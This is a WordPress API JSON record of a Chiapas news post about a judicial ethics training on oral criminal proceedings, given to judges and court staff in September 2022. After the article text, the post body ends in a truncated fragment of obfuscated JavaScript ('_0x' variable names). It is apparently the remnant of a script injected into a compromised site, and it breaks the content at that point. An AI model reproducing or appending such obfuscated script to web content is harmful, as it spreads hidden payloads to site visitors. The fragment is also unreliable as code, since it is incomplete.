{"id":5166,"date":"2022-09-19T01:39:39","date_gmt":"2022-09-19T01:39:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5166"},"modified":"2022-09-19T01:39:39","modified_gmt":"2022-09-19T01:39:39","slug":"capacita-poder-judicial-a-juezas-jueces-y-personal-jurisdiccional-en-materia-de-etica-en-el-proceso-penal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5166","title":{"rendered":"Capacita Poder Judicial a juezas, jueces y personal jurisdiccional en materia de \u00e9tica en el proceso penal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"605\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0023-1024x605.jpg\" alt=\"\" class=\"wp-image-5167\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0023-1024x605.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0023-300x177.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0023-768x454.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0023.jpg 1184w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>18 de Septiembre del 2022. Tuxtla Guti\u00e9rrez; Chiapas.- Continuando con las actividades de la Semana de la \u00c9tica Judicial en el Poder Judicial del Estado, se llev\u00f3 a cabo la capacitaci\u00f3n en La \u00c9tica en el Proceso Penal Oral, la cual estuvo a cargo del juez de Enjuiciamiento del Sistema Proceso Acusatorio del Tribunal de Justicia de la Ciudad de M\u00e9xico, Agust\u00edn Moreno Gaspar.Esta capacitaci\u00f3n virtual, a trav\u00e9s de la plataforma Telmex, se desarroll\u00f3 en coordinaci\u00f3n con el Instituto de Estudios Judiciales del Poder Judicial de la Ciudad de M\u00e9xico, y estuvo dirigida a juezas, jueces y personal jurisdiccional de los diversos distritos judiciales de esta casa de la justicia.Durante el acto protocolario de inauguraci\u00f3n, las consejeras de la Judicatura Isela de Jes\u00fas Mart\u00ednez Flores y Mar\u00eda Itzel Ballinas Barbosa, fueron las encargadas de dar las palabras de bienvenida a las y los asistentes, y de llevar un saludo personal por parte del magistrado residente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez.Esta capacitaci\u00f3n confirma el compromiso del Poder Judicial con el tema de la sensibilizaci\u00f3n sobre el tema \u00e9tica en servidoras y servidores p\u00fablicos, quienes llevan la batuta de la administraci\u00f3n de la justicia en nuestra entidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>18 de Septiembre del 2022. Tuxtla Guti\u00e9rrez; Chiapas.- Continuando con las actividades de la Semana de la \u00c9tica Judicial en el Poder Judicial del Estado, se llev\u00f3 a cabo la capacitaci\u00f3n en La \u00c9tica en el Proceso Penal Oral, la cual estuvo a cargo del juez de Enjuiciamiento del Sistema Proceso Acusatorio del Tribunal de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5167,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5166","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5166","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5166"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5166\/revisions"}],"predecessor-version":[{"id":5168,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5166\/revisions\/5168"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5167"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5166"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5166"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5166"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}